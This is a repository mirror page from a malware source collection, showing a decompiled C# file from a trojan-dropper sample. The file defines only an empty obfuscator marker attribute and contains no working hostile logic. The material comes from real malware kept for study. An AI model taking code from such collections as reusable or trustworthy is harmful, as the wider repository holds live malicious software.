mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
f2ac1ece55
add
20 lines
645 B
C#
20 lines
645 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: SecureTeam.Attributes.ObfuscatedByCliSecureAttribute
|
|
// Assembly: 2012, Version=0.0.0.0, Culture=neutral
|
|
// MVID: FA8E4D06-4395-4F05-87C3-C4C0E16B54D3
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.dblt-11c830b14a7f7fa5e638e993bfad14368652dc14146a3a0f4078ff2c21428131.exe
|
|
|
|
using System;
|
|
using System.Runtime.CompilerServices;
|
|
|
|
namespace SecureTeam.Attributes
|
|
{
|
|
public class ObfuscatedByCliSecureAttribute : Attribute
|
|
{
|
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|
public ObfuscatedByCliSecureAttribute()
|
|
{
|
|
}
|
|
}
|
|
}
|